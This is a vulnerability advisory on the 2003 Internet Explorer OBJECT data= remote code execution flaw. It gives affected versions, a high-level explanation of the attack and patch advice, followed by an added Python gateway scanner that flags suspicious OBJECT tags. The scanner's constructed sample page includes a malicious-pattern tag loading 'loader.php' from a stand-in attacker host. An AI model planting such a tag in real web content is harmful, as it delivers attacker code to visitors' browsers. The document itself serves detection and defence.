Critical Vulnerability Information

Vulnerability Name:
- Internet Explorer Object Data Remote Execution Vulnerability

Report Date:
- May 15, 2003

Release Date:
- August 20, 2003

Severity:
- High (Remote Code Execution)

Affected Systems:
- Microsoft Internet Explorer 5.01
- Microsoft Internet Explorer 5.5
- Microsoft Internet Explorer 6.0
- Microsoft Internet Explorer 6.0 for Windows Server 2003

Vulnerability Description:
- eEye Digital Security discovered a vulnerability in Microsoft Internet Explorer that allows arbitrary code execution when a malicious HTML page is rendered. The flaw is a missing file-type check on the remote data location parameter (the data= attribute) of the embedded ActiveX OBJECT tag: Internet Explorer fetches whatever that URL returns and lets the server's response decide how the content is handled, so a Trojan or other malicious code can be run silently from within a web page.

Technical Description:
- In the exploitation example, the attacker embeds an OBJECT tag in a web page whose data parameter points at an attacker-controlled server. The malicious code is delivered through that HTTP request and response and returned through the OBJECT tag. When a user loads the page, Internet Explorer parses the tag, retrieves the object and executes the malicious code without prompting the user.
- Internet Explorer's Enhanced Security Configuration mode (enabled by default on Windows Server 2003) reduces the attack surface to some extent, but it does not by itself remove this vulnerability, so Windows Server 2003 systems still require attention.

Vendor Status:
- Microsoft has released a patch for this vulnerability. See the Microsoft Security Bulletin for details.

Mitigation Measures:
- Apply the security patch released by Microsoft as soon as possible.
- Use the Retina Network Security Scanner to identify systems that are still exposed to this vulnerability.
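The following is an added detection example and is not code from the eEye advisory or from Microsoft. It implements the triage check a mail gateway or web proxy could apply to incoming HTML while the patch is being rolled out: every OBJECT tag whose data= parameter is fetched over the network is reported, with the reason (the object comes from a different host than the page, or the page declares no type and so leaves handling entirely to the server's response, which is exactly the condition the vulnerability abuses). The class and function names (ObjectDataScanner, scan_html), the sample page and the host names are constructed for this example; an unpatched Internet Explorer ignores the page's declared type anyway, so this is a heuristic for spotting suspicious content, not a substitute for the vendor patch.

```python
"""Flag <object> tags whose data= parameter pulls content from a remote server.

Added example, not part of the original advisory. Sample HTML and host
names below are constructed; scan_html() is a hypothetical gateway check.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Schemes for which Internet Explorer would issue a network fetch for data=.
NETWORK_SCHEMES = {"http", "https", "ftp"}


class ObjectDataScanner(HTMLParser):
    """Collect <object> elements whose data= attribute is fetched over the network."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()   # host the page itself was served from
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "object":
            return
        # HTMLParser lowercases attribute names; a valueless attribute has value None.
        attr = {k.lower(): (v or "").strip() for k, v in attrs}
        data = attr.get("data", "")
        if not data:
            return
        url = urlparse(data)
        if url.scheme.lower() not in NETWORK_SCHEMES:
            return  # relative or non-network reference: outside this check
        reasons = []
        if url.hostname is None or url.hostname != self.page_host:
            reasons.append("data= points at a different host")
        if not attr.get("type"):
            reasons.append("no type= attribute: handling is left to the server response")
        if reasons:
            line, _ = self.getpos()
            self.findings.append(
                {"line": line, "data": data, "type": attr.get("type", ""), "reasons": reasons}
            )


def scan_html(html, page_host):
    """Return a list of findings for every suspicious <object data=...> in `html`."""
    scanner = ObjectDataScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: one local PDF, one cross-host object with no declared
# type (the pattern described in the advisory), one cross-host Flash object and
# one same-host image.
SAMPLE_PAGE = """<html><body>
<p>Quarterly results</p>
<object data="report.pdf" type="application/pdf"></object>
<object data="http://evil.example/loader.php"></object>
<object DATA="https://cdn.example/widget.swf" TYPE="application/x-shockwave-flash"></object>
<object data="https://intranet.example/chart.svg" type="image/svg+xml"></object>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE, "intranet.example"):
        print(f"line {f['line']}: {f['data']} -> {'; '.join(f['reasons'])}")
```

Running the block against the constructed sample reports the loader.php object (cross-host and no declared type) and the widget.swf object (cross-host only); the relative PDF and the same-host SVG are not reported. A gateway would typically quarantine or rewrite pages with the first kind of finding and only log the second.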